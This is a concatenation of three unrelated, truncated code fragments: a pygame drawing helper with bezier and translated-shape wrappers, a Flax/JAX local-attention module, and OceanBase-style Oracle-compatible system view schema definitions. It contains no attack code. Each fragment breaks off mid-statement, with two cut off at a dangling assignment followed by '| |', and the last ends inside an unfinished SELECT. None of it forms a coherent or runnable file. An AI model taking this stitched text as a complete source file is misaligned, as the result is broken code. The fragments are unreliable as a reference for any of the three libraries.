:param width: Number
:return: pygame.Rect
"""
if delta >= 1 or delta <= 0:
if delta >= 1:
raise ValueError(f"delta in bezier function is bigger or equal than 1")
if delta <= 0:
raise ValueError(f"delta in bezier function is smaller or equal than 0")
mul_am = int(1 / delta)
beginShape(surface)
for t in range(0, mul_am + 1, 1):
t /= mul_am
v1 = cls._quadratic(p1, p2, p3, t)
v2 = cls._quadratic(p2, p3, p4, t)
vertex(lerp(v1.x, v2.x, t), lerp(v1.y, v2.y, t))
return endShape(color=color, width=width)
class Draw:
bezier = Curves.bezier
quadratic_bezier = Curves.quadratic_bezier
@staticmethod
def push() -> None:
"""
it saves the current 0, 0 location for drawing
:return: None
"""
_SO.list_prev_00.append(_SO.loc_00.copy())
@staticmethod
def translate(
x: Union[Number, pygame.math.Vector2, Tuple[Number, Number], List[Number]],
y: Optional[Number]=_MISSING
) -> None:
"""
it sets the 0, 0 position for drawing
:param x: Optional[Union[Number, pygame.math.Vector2, Vector, Tuple[Number, Number], List[Number]]]
:param y: Optional[Number]
:return:
"""
if y is _MISSING or y is None:
if not isinstance(x, (int, float)):
x, y = x
else:
y = x
_SO.loc_00.x = x
_SO.loc_00.y = y
@staticmethod
def pop() -> None:
"""
it gets the old 0, 0 location for drawing
:return: None
"""
if not len(_SO.list_prev_00):
raise NoLocationFound("tried to 'pop' without having 'pushed' any values")
_SO.loc_00 = pygame.math.Vector2(_SO.list_prev_00.pop())
@staticmethod
def beginShape(surface: pygame.surface.Surface) -> None:
"""
begins recording vertices for a shape
:param surface: pygame.surface.Surface
:return: None
"""
_SO.vertexes_list.append([])
_SO.surfaces.append(surface)
@staticmethod
def vertex(
x: Union[Number, pygame.math.Vector2, Tuple[Number, Number], List[Number]],
y: Optional[Number]=_MISSING
) -> None:
"""
specify the vertex coordinates for the shapes
:param x: Optional[Union[Number, pygame.math.Vector2, Vector, Tuple[Number, Number], List[Number]]]
:param y: Optional[Number]
:return:
"""
if y is _MISSING or y is None:
if not isinstance(x, (int, float)):
x, y = x
else:
y = x
_SO.vertexes_list[~0].append((int(x), int(y)))
@staticmethod
def endShape(
closed: Optional[Union[int, bool]]=None,
fill: Optional[Union[int, bool]]=None,
color: ColorType=(255, 255, 255),
width: int=1,
outline: Optional[int]=0,
outline_color: ColorType=BLACK
) -> pygame.Rect:
"""
it ends the shape and draws the shape that was constructed by the beginShape and vertex
:param closed: Optional[Union[int, bool]]=None
:param fill: Optional[Union[int, bool]]=None
:param color: ColorType=(255, 255, 255)
:param width: int=1
:param outline: Optional[int]=0
:param outline_color: Optional[ColorType]
:return: pygame.Rect
"""
if not len(_SO.surfaces):
raise ShapeError("shape was never started. start a shape with PygameHelper.beginShape")
if fill:
xx = sorted([v[0] for v in _SO.vertexes_list[~0]])
yy = sorted([v[1] for v in _SO.vertexes_list[~0]])
min_x = xx[0]
max_x = xx[~0]
min_y = yy[0]
max_y = yy[~0]
w = int(max_x - min_x)
h = int(max_y - min_y)
surf = pygame.surface.Surface((w, h))
if color[0] >= 255: surf.fill((0, color[1], color[2])); surf.set_colorkey((0, color[1], color[2]))
else: surf.fill((255, color[1], color[2])); surf.set_colorkey((255, color[1], color[2]))
pygame.draw.polygon(surf, color, [(p[0] + abs(min_x), p[1] + abs(min_y)) for p in _SO.vertexes_list[~0]])
r = _SO.surfaces[~0].blit(surf, (_SO.loc_00.x, _SO.loc_00.y))
else:
r = lines(_SO.surfaces[~0], color, closed, _SO.vertexes_list[~0], width)
if outline: lines(_SO.surfaces[~0], outline_color, closed, _SO.vertexes_list[~0], outline)
_SO.vertexes_list.pop()
_SO.surfaces.pop()
return r
@staticmethod
def rect(
surface: pygame.surface.Surface,
color: ColorType,
rect: RectType,
width: Optional[int]=0,
border_radius: Optional[int]=-1,
border_top_left_radius: Optional[int]=-1,
border_top_right_radius: Optional[int]=-1,
border_bottom_left_radius: Optional[int]=-1,
border_bottom_right_radius: Optional[int]=-1
) -> pygame.Rect:
"""
a wrapper for pygame.draw.rect but it utilises the translated value
:param surface: pygame.surface.Surface
:param color: ColorType
:param rect: RectType
:param width: Optional[int]=0
:param border_radius: Optional[int]=-1
:param border_top_left_radius: Optional[int]=-1
:param border_top_right_radius: Optional[int]=-1
:param border_bottom_left_radius: Optional[int]=-1
:param border_bottom_right_radius: Optional[int]=-1
:return: pygame.Rect
"""
rect = pygame.Rect(rect)
rect.x += _SO.loc_00.x
rect.y += _SO.loc_00.y
return pygame.draw.rect(
surface,
color,
rect,
width,
border_radius,
border_top_left_radius,
border_top_right_radius,
border_bottom_left_radius,
border_bottom_right_radius
)
@staticmethod
def polygon(
surface: pygame.surface.Surface,
color: ColorType,
points: Sequence[CoordsType],
width: Optional[int]=0
) -> pygame.Rect:
"""
a wrapper for pygame.draw.polygon but it utilises the translated value
:param surface: pygame.surface.Surface
:param color: ColorType
:param points: Sequence[CoordsType]
:param width: Optional[int]=0
:return: pygame.Rect
"""
return pygame.draw.polygon(
surface,
color,
list(map(lambda pos: (pos[0] + _SO.loc_00.x, pos[1] + _SO.loc_00.y), points)),
width
)
@staticmethod
def circle(
surface: pygame.surface.Surface,
color: ColorType,
center: CoordsType,
radius: float,
width: Optional[int] = 0,
draw_top_right: bool=False,
draw_top_left: bool=False,
draw_bottom_left: bool=False,
draw_bottom_right: bool=False
) -> pygame.Rect:
"""
a wrapper for pygame.draw.circle but it utilises the translated value
:param surface: pygame.surface.Surface
:param color: ColorType
:param center: CoordsType
:param radius: float
:param width: Optional[int] = 0
:param draw_top_right: Optional[bool]=None
:param draw_top_left: Optional[bool]=None
:param draw_bottom_left: Optional[bool]=None
:param draw_bottom_right: Optional[bool]=None
:return: pygame.Rect
"""
return pygame.draw.circle(
surface,
color,
(center[0] + _SO.loc_00.x, center[1] + _SO.loc_00.y),
radius,
width,
draw_top_right,
draw_top_left,
draw_bottom_left,
draw_bottom_right
)
@staticmethod
def ellipse(
surface: pygame.surface.Surface,
color: ColorType,
rect: RectType,
width: Optional[int] = 0
) -> pygame.Rect:
"""
a wrapper for pygame.draw.ellipse but it utilises the translated value
:param surface: pygame.surface.Surface
:param color: ColorType
:param rect: RectType
:param width: Optional[int]=0
:return: pygame.Rect
"""
rect = pygame.Rect(rect)
rect.x += _SO.loc_00.x
rect.y += _SO.loc_00.y
return pygame.draw.ellipse(
surface,
color,
rect,
width
)
@staticmethod
def arc(
surface: pygame.surface.Surface,
color: ColorType,
rect: RectType,
start_angle: float,
stop_angle: float,
width: Optional[int]=1
) -> pygame.Rect:
"""
a wrapper for pygame.draw.arc but it utilises the translated value
:param surface: pygame.surface.Surface
:param color: ColorType
:param rect: RectType
:param start_angle: float
:param stop_angle: float
:param width: Optional[int] = 1
:return: pygame.Rect
"""
rect = | |
# Copyright 2021 Google LLC
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# https://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Local Attention modules."""
from collections.abc import Iterable # pylint: disable=g-importing-member
from absl import logging
from flax import nn
from flax.nn.attention import _CacheEntry
from flax.nn.attention import _make_causal_mask
from flax.nn.attention import Cache
from flax.nn.attention import make_padding_mask
from flax.nn.stochastic import make_rng
import jax
from jax import lax
from jax import random
import jax.numpy as jnp
import numpy as onp
def local_dot_product_attention(query,
key,
value,
dtype=jnp.float32,
bias=None,
axis=None,
broadcast_dropout=True,
dropout_rng=None,
dropout_rate=0.,
deterministic=False,
precision=None):
"""Computes dot-product attention given query, key, and value.
Note: This is equivalent to the dot product attention in flax.nn.
However, we do extra broadcasting of the bias in this function.
I'm leaving this here in case we need to modify something later.
This is the core function for applying attention based on
https://arxiv.org/abs/1706.03762. It calculates the attention weights given
query and key and combines the values using the attention weights. This
function supports multi-dimensional inputs.
Args:
query: queries for calculating attention with shape of `[batch_size, dim1,
dim2, ..., dimN, num_heads, mem_channels]`.
key: keys for calculating attention with shape of `[batch_size, dim1, dim2,
..., dimN, num_heads, mem_channels]`.
value: values to be used in attention with shape of `[batch_size, dim1,
dim2,..., dimN, num_heads, value_channels]`.
dtype: the dtype of the computation (default: float32)
bias: bias for the attention weights. This can be used for incorporating
autoregressive mask, padding mask, proximity bias.
axis: axises over which the attention is applied.
broadcast_dropout: bool: use a broadcasted dropout along batch dims.
dropout_rng: JAX PRNGKey: to be used for dropout
dropout_rate: dropout rate
deterministic: bool, deterministic or not (to apply dropout)
precision: numerical precision of the computation see `jax.lax.Precision`
for details.
Returns:
Output of shape `[bs, dim1, dim2, ..., dimN,, num_heads, value_channels]`.
"""
assert key.shape[:-1] == value.shape[:-1]
assert (query.shape[0:1] == key.shape[0:1] and
query.shape[-1] == key.shape[-1])
if axis is None:
axis = tuple(range(1, key.ndim - 2))
if not isinstance(axis, Iterable):
axis = (axis,)
assert key.ndim == query.ndim
assert key.ndim == value.ndim
for ax in axis:
if not (query.ndim >= 3 and 1 <= ax < query.ndim - 2):
raise ValueError('Attention axis must be between the batch '
'axis and the last-two axes.')
depth = query.shape[-1]
n = key.ndim
# batch_dims is <bs, <non-attention dims>, num_heads>
batch_dims = tuple(onp.delete(range(n), axis + (n - 1,)))
# q & k -> (bs, <non-attention dims>, num_heads, <attention dims>, channels)
qk_perm = batch_dims + axis + (n - 1,)
key = key.transpose(qk_perm)
query = query.transpose(qk_perm)
# v -> (bs, <non-attention dims>, num_heads, channels, <attention dims>)
v_perm = batch_dims + (n - 1,) + axis
value = value.transpose(v_perm)
query = query / jnp.sqrt(depth).astype(dtype)
batch_dims_t = tuple(range(len(batch_dims)))
attn_weights = lax.dot_general(
query,
key, (((n - 1,), (n - 1,)), (batch_dims_t, batch_dims_t)),
precision=precision)
# apply attention bias: masking, droput, proximity bias, ect.
if bias is not None:
bias = bias[:, :, None, :, :]
attn_weights = attn_weights + bias
# normalize the attention weights
norm_dims = tuple(range(attn_weights.ndim - len(axis), attn_weights.ndim))
attn_weights = jax.nn.softmax(attn_weights, axis=norm_dims)
attn_weights = attn_weights.astype(dtype)
# apply dropout
if not deterministic and dropout_rate > 0.:
if dropout_rng is None:
dropout_rng = make_rng()
keep_prob = jax.lax.tie_in(attn_weights, 1.0 - dropout_rate)
if broadcast_dropout:
# dropout is broadcast across the batch+head+non-attention dimension
dropout_dims = attn_weights.shape[-(2 * len(axis)):]
dropout_shape = (tuple([1] * len(batch_dims_t)) + dropout_dims)
keep = random.bernoulli(dropout_rng, keep_prob, dropout_shape)
else:
keep = random.bernoulli(dropout_rng, keep_prob, attn_weights.shape)
multiplier = (keep.astype(attn_weights.dtype) /
jnp.asarray(keep_prob, dtype=dtype))
attn_weights = attn_weights * multiplier
# compute the new values given the attention weights
wv_contracting_dims = (norm_dims, range(value.ndim - len(axis), value.ndim))
y = lax.dot_general(
attn_weights,
value, (wv_contracting_dims, (batch_dims_t, batch_dims_t)),
precision=precision)
# back to (bs, dim1, dim2, ..., dimN, num_heads, channels)
perm_inv = _invert_perm(qk_perm)
y = y.transpose(perm_inv)
return y
def _invert_perm(perm):
perm_inv = [0] * len(perm)
for i, j in enumerate(perm):
perm_inv[j] = i
return tuple(perm_inv)
class LocalAttention(nn.Module):
"""Multi-head Local Attention Architecture."""
def apply(self,
inputs_q,
inputs_kv,
num_heads,
dtype=jnp.float32,
qkv_features=None,
out_features=None,
attention_axis=None,
causal_mask=False,
padding_mask=None,
key_padding_mask=None,
segmentation=None,
key_segmentation=None,
cache=None,
broadcast_dropout=True,
dropout_rng=None,
dropout_rate=0.,
deterministic=False,
precision=None,
kernel_init=nn.linear.default_kernel_init,
bias_init=nn.initializers.zeros,
bias=True,
block_size=20):
"""Applies multi-head synthesizer attention on the input data.
Projects the inputs into multi-headed query, key, and value vectors,
applies dot-product attention and project the results to an output vector.
This can be used for encoder-decoder attention by specifying both `inputs_q`
and `inputs_kv` orfor self-attention by only specifying `inputs_q` and
setting `inputs_kv` to None.
Args:
inputs_q: input queries of shape `[bs, dim1, dim2, ..., dimN, features]`.
inputs_kv: key/values of shape `[bs, dim1, dim2, ..., dimN, features]`
or None for self-attention, inn which case key/values will be derived
from inputs_q.
num_heads: number of attention heads. Features (i.e. inputs_q.shape[-1])
should be divisible by the number of heads.
dtype: the dtype of the computation (default: float32)
qkv_features: dimension of the key, query, and value.
out_features: dimension of the last projection
attention_axis: axes over which the attention is applied ( 'None' means
attention over all axes, but batch, heads, and features).
causal_mask: boolean specifying whether to apply a causal mask on the
attention weights. If True, the output at timestep `t` will not depend
on inputs at timesteps strictly greater than `t`.
padding_mask: boolean specifying query tokens that are pad token.
key_padding_mask: boolean specifying key-value tokens that are pad token.
segmentation: segment indices for packed inputs_q data.
key_segmentation: segment indices for packed inputs_kv data.
cache: an instance of `flax.nn.attention.Cache` used for efficient
autoregressive decoding.
broadcast_dropout: bool: use a broadcasted dropout along batch dims.
dropout_rng: JAX PRNGKey: to be used for dropout
dropout_rate: dropout rate
deterministic: bool, deterministic or not (to apply dropout)
precision: numerical precision of the computation see `jax.lax.Precision`
for details.
kernel_init: initializer for the kernel of the Dense layers.
bias_init: initializer for the bias of the Dense layers.
bias: bool: whether pointwise QKVO dense transforms use bias.
block_size: int, block size.
Returns:
output of shape `[bs, dim1, dim2, ..., dimN, features]`.
"""
orig_seqlen = inputs_q.shape[-2]
logging.info(inputs_q)
extra_len = block_size - (orig_seqlen % block_size)
pad_width = jnp.array([[0, 0], [0, extra_len], [0, 0]])
mask_pad = jnp.array([[0, 0], [0, extra_len], [0, 0]])
inputs_q = jnp.pad(inputs_q, pad_width)
if inputs_kv is not None:
inputs_kv = jnp.pad(inputs_kv, pad_width)
# logging.info(padding_mask)
padding_mask = jnp.pad(padding_mask, mask_pad, constant_values=-1e9)
# logging.info(inputs_q)
assert causal_mask or not cache, (
'Caching is only support for causal attention.')
assert inputs_q.ndim == 3
if inputs_kv is None:
inputs_kv = inputs_q
if attention_axis is None:
attention_axis = tuple(range(1, inputs_q.ndim - 1))
features = out_features or inputs_q.shape[-1]
qkv_features = qkv_features or inputs_q.shape[-1]
assert qkv_features % num_heads == 0, (
'Memory dimension must be divisible by number of heads.')
head_dim = qkv_features // num_heads
dense = nn.DenseGeneral.partial(
axis=-1,
features=(num_heads, head_dim),
kernel_init=kernel_init,
bias_init=bias_init,
bias=bias,
precision=precision)
# project inputs_q to multi-headed q/k/v
# dimensions are then [bs, dims..., n_heads, n_features_per_head]
qlength = inputs_q.shape[-2]
bs = inputs_q.shape[0]
kvlength = inputs_kv.shape[-2]
query, key, value = (dense(inputs_q, dtype=dtype, name='query'),
dense(inputs_kv, dtype=dtype, name='key'),
dense(inputs_kv, dtype=dtype, name='value'))
if cache:
assert isinstance(cache, Cache), 'cache must be an instance of Cache'
if self.is_initializing():
cache.store(onp.array((key.ndim,) + key.shape[-2:], dtype=onp.int32))
else:
cache_entry = cache.retrieve(None)
expected_shape = list(cache_entry.key.shape[:-2])
for attn_dim in attention_axis:
expected_shape[attn_dim] = 1
expected_shape = tuple(expected_shape) + inputs_q.shape[-1:]
if expected_shape != inputs_q.shape:
raise ValueError('Invalid shape provided, '
'expected shape %s instead got %s.' %
(expected_shape, inputs_q.shape))
if not isinstance(cache_entry, _CacheEntry):
raise ValueError('Cache is not initialized.')
cshape = cache_entry.key.shape
indices = [0] * len(cshape)
i = cache_entry.i
attn_size = onp.prod(onp.take(cshape, attention_axis))
for attn_dim in attention_axis:
attn_size //= cshape[attn_dim]
indices[attn_dim] = i // attn_size
i = i % attn_size
key = lax.dynamic_update_slice(cache_entry.key, key, indices)
value = lax.dynamic_update_slice(cache_entry.value, value, indices)
one = jnp.array(1, jnp.uint32)
cache_entry = cache_entry.replace(i=cache_entry.i + one,
key=key,
value=value)
cache.store(cache_entry)
key_padding_mask = | |
'OB_ORA_SYS_DATABASE_ID',
table_id = '25100',
table_type = 'SYSTEM_VIEW',
rowkey_columns = [],
normal_columns = [],
gm_columns = [],
in_tenant_space = True,
view_definition = """
SELECT
CAST(NULL AS VARCHAR2(30)) AS JOB_NAME,
CAST(NULL AS VARCHAR2(30)) AS ARGUMENT_NAME,
CAST(NULL AS NUMBER) AS ARGUMENT_POSITION,
CAST(NULL AS VARCHAR2(61)) AS ARGUMENT_TYPE,
CAST(NULL AS VARCHAR2(4000)) AS VALUE,
CAST(NULL as /* TODO: RAW */ VARCHAR(128)) AS DEFAULT_ANYDATA_VALUE,
CAST(NULL AS VARCHAR2(5)) AS OUT_ARGUMENT
FROM
DUAL
WHERE
1 = 0
""".replace("\n", " ")
)
def_table_schema(
table_name = "ALL_ERRORS",
name_postfix = "_ORA",
database_id = 'OB_ORA_SYS_DATABASE_ID',
table_id = '25101',
table_type = 'SYSTEM_VIEW',
rowkey_columns = [],
normal_columns = [],
gm_columns = [],
in_tenant_space = True,
view_definition = """
SELECT
CAST(o.owner AS VARCHAR2(128)) AS OWNER,
CAST(o.object_name AS VARCHAR2(128)) AS NAME,
CAST(o.object_type AS VARCHAR2(19)) AS TYPE,
CAST(e.obj_seq AS NUMBER) AS SEQUENCE,
CAST(e.line AS NUMBER) AS LINE,
CAST(e.position AS NUMBER) AS POSITION,
CAST(e.text as VARCHAR2(4000)) AS TEXT,
CAST(DECODE(e.property, 0, 'ERROR', 1, 'WARNING', 'UNDEFINED') AS VARCHAR2(9)) AS ATTRIBUTE,
CAST(e.error_number AS NUMBER) AS MESSAGE_NUMBER
FROM
all_objects o,
(select obj_id, obj_seq, line, position, text, property, error_number, CAST( UPPER(decode(obj_type,
3, 'PACKAGE',
4, 'TYPE',
5, 'PACKAGE BODY',
6, 'TYPE BODY',
7, 'TRIGGER',
8, 'VIEW',
9, 'FUNCTION',
12, 'PROCEDURE',
'MAXTYPE')) AS VARCHAR2(23)) object_type from sys.ALL_VIRTUAL_TENANT_ERROR_REAL_AGENT
WHERE TENANT_ID = EFFECTIVE_TENANT_ID()) e
WHERE
o.object_id = e.obj_id
AND o.object_type like e.object_type
AND o.object_type IN (UPPER('package'),
UPPER('type'),
UPPER('procedure'),
UPPER('function'),
UPPER('package body'),
UPPER('view'),
UPPER('trigger'),
UPPER('type body'),
UPPER('library'),
UPPER('queue'),
UPPER('java source'),
UPPER('java class'),
UPPER('dimension'),
UPPER('assembly'),
UPPER('hierarchy'),
UPPER('arrtibute dimension'),
UPPER('analytic view'))
""".replace("\n", " ")
)
def_table_schema(
table_name = "DBA_ERRORS",
name_postfix = "_ORA",
database_id = 'OB_ORA_SYS_DATABASE_ID',
table_id = '25102',
table_type = 'SYSTEM_VIEW',
rowkey_columns = [],
normal_columns = [],
gm_columns = [],
in_tenant_space = True,
view_definition = """
SELECT
CAST(o.owner AS VARCHAR2(128)) AS OWNER,
CAST(o.object_name AS VARCHAR2(128)) AS NAME,
CAST(o.object_type AS VARCHAR2(19)) AS TYPE,
CAST(e.obj_seq AS NUMBER) AS SEQUENCE,
CAST(e.line AS NUMBER) AS LINE,
CAST(e.position AS NUMBER) AS POSITION,
CAST(e.text as VARCHAR2(4000)) AS TEXT,
CAST(DECODE(e.property, 0, 'ERROR', 1, 'WARNING', 'UNDEFINED') AS VARCHAR2(9)) AS ATTRIBUTE,
CAST(e.error_number AS NUMBER) AS MESSAGE_NUMBER
FROM
all_objects o,
(select obj_id, obj_seq, line, position, text, property, error_number, CAST( UPPER(decode(obj_type,
3, 'PACKAGE',
4, 'TYPE',
5, 'PACKAGE BODY',
6, 'TYPE BODY',
7, 'TRIGGER',
8, 'VIEW',
9, 'FUNCTION',
12, 'PROCEDURE',
'MAXTYPE')) AS VARCHAR2(23)) object_type from sys.ALL_VIRTUAL_TENANT_ERROR_REAL_AGENT
WHERE TENANT_ID = EFFECTIVE_TENANT_ID()) e
WHERE
o.object_id = e.obj_id
AND o.object_type like e.object_type
AND o.object_type IN (UPPER('package'),
UPPER('type'),
UPPER('procedure'),
UPPER('function'),
UPPER('package body'),
UPPER('view'),
UPPER('trigger'),
UPPER('type body'),
UPPER('library'),
UPPER('queue'),
UPPER('java source'),
UPPER('java class'),
UPPER('dimension'),
UPPER('assembly'),
UPPER('hierarchy'),
UPPER('arrtibute dimension'),
UPPER('analytic view'))
""".replace("\n", " ")
)
def_table_schema(
table_name = "USER_ERRORS",
name_postfix = "_ORA",
database_id = 'OB_ORA_SYS_DATABASE_ID',
table_id = '25103',
table_type = 'SYSTEM_VIEW',
rowkey_columns = [],
normal_columns = [],
gm_columns = [],
in_tenant_space = True,
view_definition = """
SELECT
CAST(o.owner AS VARCHAR2(128)) AS OWNER,
CAST(o.object_name AS VARCHAR2(128)) AS NAME,
CAST(o.object_type AS VARCHAR2(19)) AS TYPE,
CAST(e.obj_seq AS NUMBER) AS SEQUENCE,
CAST(e.line AS NUMBER) AS LINE,
CAST(e.position AS NUMBER) AS POSITION,
CAST(e.text as VARCHAR2(4000)) AS TEXT,
CAST(DECODE(e.property, 0, 'ERROR', 1, 'WARNING', 'UNDEFINED') AS VARCHAR2(9)) AS ATTRIBUTE,
CAST(e.error_number AS NUMBER) AS MESSAGE_NUMBER
FROM
all_objects o,
(select obj_id, obj_seq, line, position, text, property, error_number, CAST( UPPER(decode(obj_type,
3, 'PACKAGE',
4, 'TYPE',
5, 'PACKAGE BODY',
6, 'TYPE BODY',
7, 'TRIGGER',
8, 'VIEW',
9, 'FUNCTION',
12, 'PROCEDURE',
'MAXTYPE')) AS VARCHAR2(23)) object_type from sys.ALL_VIRTUAL_TENANT_ERROR_REAL_AGENT
WHERE TENANT_ID = EFFECTIVE_TENANT_ID()) e,
all_users u
WHERE
o.object_id = e.obj_id
AND o.object_type like e.object_type
AND o.object_type IN (UPPER('package'),
UPPER('type'),
UPPER('procedure'),
UPPER('function'),
UPPER('package body'),
UPPER('view'),
UPPER('trigger'),
UPPER('type body'),
UPPER('library'),
UPPER('queue'),
UPPER('java source'),
UPPER('java class'),
UPPER('dimension'),
UPPER('assembly'),
UPPER('hierarchy'),
UPPER('arrtibute dimension'),
UPPER('analytic view'))
AND u.username=o.owner
AND u.userid IN (USERENV('SCHEMAID'))
""".replace("\n", " ")
)
def_table_schema(
table_name = "ALL_TYPE_METHODS",
name_postfix = "_ORA",
database_id = 'OB_ORA_SYS_DATABASE_ID',
table_id = '25104',
table_type = 'SYSTEM_VIEW',
rowkey_columns = [],
normal_columns = [],
gm_columns = [],
in_tenant_space = True,
view_definition = """
SELECT
CAST(NULL AS VARCHAR2(30)) AS OWNER,
CAST(NULL AS VARCHAR2(30)) AS TYPE_NAME,
CAST(NULL AS VARCHAR2(30)) AS METHOD_NAME,
CAST(NULL AS NUMBER) AS METHOD_NO,
CAST(NULL AS VARCHAR2(6)) AS METHOD_TYPE,
CAST(NULL AS NUMBER) AS PARAMETERS,
CAST(NULL AS NUMBER) AS RESULTS,
CAST(NULL AS VARCHAR2(3)) AS FINAL,
CAST(NULL AS VARCHAR2(3)) AS INSTANTIABLE,
CAST(NULL AS VARCHAR2(3)) AS OVERRIDING,
CAST(NULL AS VARCHAR2(3)) AS INHERITED
FROM
DUAL
WHERE
1 = 0
""".replace("\n", " ")
)
def_table_schema(
table_name = "DBA_TYPE_METHODS",
name_postfix = "_ORA",
database_id = 'OB_ORA_SYS_DATABASE_ID',
table_id = '25105',
table_type = 'SYSTEM_VIEW',
rowkey_columns = [],
normal_columns = [],
gm_columns = [],
in_tenant_space = True,
view_definition = """
SELECT
CAST(NULL AS VARCHAR2(30)) AS OWNER,
CAST(NULL AS VARCHAR2(30)) AS TYPE_NAME,
CAST(NULL AS VARCHAR2(30)) AS METHOD_NAME,
CAST(NULL AS NUMBER) AS METHOD_NO,
CAST(NULL AS VARCHAR2(6)) AS METHOD_TYPE,
CAST(NULL AS NUMBER) AS PARAMETERS,
CAST(NULL AS NUMBER) AS RESULTS,
CAST(NULL AS VARCHAR2(3)) AS FINAL,
CAST(NULL AS VARCHAR2(3)) AS INSTANTIABLE,
CAST(NULL AS VARCHAR2(3)) AS OVERRIDING,
CAST(NULL AS VARCHAR2(3)) AS INHERITED
FROM
DUAL
WHERE
1 = 0
""".replace("\n", " ")
)
def_table_schema(
table_name = "USER_TYPE_METHODS",
name_postfix = "_ORA",
database_id = 'OB_ORA_SYS_DATABASE_ID',
table_id = '25106',
table_type = 'SYSTEM_VIEW',
rowkey_columns = [],
normal_columns = [],
gm_columns = [],
in_tenant_space = True,
view_definition = """
SELECT
CAST(NULL AS VARCHAR2(30)) AS TYPE_NAME,
CAST(NULL AS VARCHAR2(30)) AS METHOD_NAME,
CAST(NULL AS NUMBER) AS METHOD_NO,
CAST(NULL AS VARCHAR2(6)) AS METHOD_TYPE,
CAST(NULL AS NUMBER) AS PARAMETERS,
CAST(NULL AS NUMBER) AS RESULTS,
CAST(NULL AS VARCHAR2(3)) AS FINAL,
CAST(NULL AS VARCHAR2(3)) AS INSTANTIABLE,
CAST(NULL AS VARCHAR2(3)) AS OVERRIDING,
CAST(NULL AS VARCHAR2(3)) AS INHERITED
FROM
DUAL
WHERE
1 = 0
""".replace("\n", " ")
)
def_table_schema(
table_name = "ALL_METHOD_PARAMS",
name_postfix = "_ORA",
database_id = 'OB_ORA_SYS_DATABASE_ID',
table_id = '25107',
table_type = 'SYSTEM_VIEW',
rowkey_columns = [],
normal_columns = [],
gm_columns = [],
in_tenant_space = True,
view_definition = """
SELECT
CAST(NULL AS VARCHAR2(30)) AS OWNER,
CAST(NULL AS VARCHAR2(30)) AS TYPE_NAME,
CAST(NULL AS VARCHAR2(30)) AS METHOD_NAME,
CAST(NULL AS NUMBER) AS METHOD_NO,
CAST(NULL AS VARCHAR2(30)) AS PARAM_NAME,
CAST(NULL AS NUMBER) AS PARAM_NO,
CAST(NULL AS VARCHAR2(6)) AS PARAM_MODE,
CAST(NULL AS VARCHAR2(7)) AS PARAM_TYPE_MOD,
CAST(NULL AS VARCHAR2(30)) AS PARAM_TYPE_OWNER,
CAST(NULL AS VARCHAR2(30)) AS PARAM_TYPE_NAME,
CAST(NULL AS VARCHAR2(44)) AS CHARACTER_SET_NAME
FROM
DUAL
WHERE
1 = 0
""".replace("\n", " ")
)
def_table_schema(
table_name = "DBA_METHOD_PARAMS",
name_postfix = "_ORA",
database_id = 'OB_ORA_SYS_DATABASE_ID',
table_id = '25108',
table_type = 'SYSTEM_VIEW',
rowkey_columns = [],
normal_columns = [],
gm_columns = [],
in_tenant_space = True,
view_definition = """
SELECT
CAST(NULL AS VARCHAR2(30)) AS OWNER,
CAST(NULL AS VARCHAR2(30)) AS TYPE_NAME,
CAST(NULL AS VARCHAR2(30)) AS METHOD_NAME,
CAST(NULL AS NUMBER) AS METHOD_NO,
CAST(NULL AS VARCHAR2(30)) AS PARAM_NAME,
CAST(NULL AS NUMBER) AS PARAM_NO,
CAST(NULL AS VARCHAR2(6)) AS PARAM_MODE,
CAST(NULL AS VARCHAR2(7)) AS PARAM_TYPE_MOD,
CAST(NULL AS VARCHAR2(30)) AS PARAM_TYPE_OWNER,
CAST(NULL AS VARCHAR2(30)) AS PARAM_TYPE_NAME,
CAST(NULL AS VARCHAR2(44)) AS CHARACTER_SET_NAME
FROM
DUAL
WHERE
1 = 0
""".replace("\n", " ")
)
def_table_schema(
table_name = "USER_METHOD_PARAMS",
name_postfix = "_ORA",
database_id = 'OB_ORA_SYS_DATABASE_ID',
table_id = '25109',
table_type = 'SYSTEM_VIEW',
rowkey_columns = [],
normal_columns = [],
gm_columns = [],
in_tenant_space = True,
view_definition = """
SELECT
CAST(NULL AS VARCHAR2(30)) AS TYPE_NAME,
CAST(NULL AS VARCHAR2(30)) AS METHOD_NAME,
CAST(NULL AS NUMBER) AS METHOD_NO,
CAST(NULL AS VARCHAR2(30)) AS PARAM_NAME,
CAST(NULL AS NUMBER) AS PARAM_NO,
CAST(NULL AS VARCHAR2(6)) AS PARAM_MODE,
CAST(NULL AS VARCHAR2(7)) AS PARAM_TYPE_MOD,
CAST(NULL AS VARCHAR2(30)) AS PARAM_TYPE_OWNER,
CAST(NULL AS VARCHAR2(30)) AS PARAM_TYPE_NAME,
CAST(NULL AS VARCHAR2(44)) AS CHARACTER_SET_NAME
FROM
DUAL
WHERE
1 = 0
""".replace("\n", " ")
)
def_table_schema(
table_name = 'DBA_TABLESPACES',
name_postfix = '_ORA',
database_id = 'OB_ORA_SYS_DATABASE_ID',
table_id = '25110',
table_type = 'SYSTEM_VIEW',
rowkey_columns = [],
normal_columns = [],
gm_columns = [],
in_tenant_space = True,
view_definition = """SELECT
TABLESPACE_NAME,
CAST(NULL AS NUMBER) BLOCK_SIZE,
CAST(NULL AS NUMBER) INITIAL_EXTENT,
CAST(NULL AS NUMBER) NEXT_EXTENT,
CAST(NULL AS NUMBER) MIN_EXTENT,
CAST(NULL AS NUMBER) MAX_EXTENT,
CAST(NULL AS NUMBER) MAX_SIZE,
CAST(NULL AS NUMBER) PCT_INCREASE,
CAST(NULL AS NUMBER) MIN_EXTLEN,
CAST(NULL AS VARCHAR2(9)) STATUS,
CAST(NULL AS VARCHAR2(9)) CONTENTS,
CAST(NULL AS VARCHAR2(9)) LOGGING,
CAST(NULL AS VARCHAR2(3)) FORCE_LOGGING,
CAST(NULL AS VARCHAR2(10)) EXTENT_MANAGEMENT,
CAST(NULL AS VARCHAR2(9)) ALLOCATION_TYPE,
CAST(NULL AS VARCHAR2(3)) PLUGGED_IN,
CAST(NULL AS VARCHAR2(6)) SEGMENT_SPACE_MANAGEMENT,
CAST(NULL AS VARCHAR2(8)) DEF_TAB_COMPRESSION,
CAST(NULL AS VARCHAR2(11)) RETENTION,
CAST(NULL AS VARCHAR2(3)) BIGFILE,
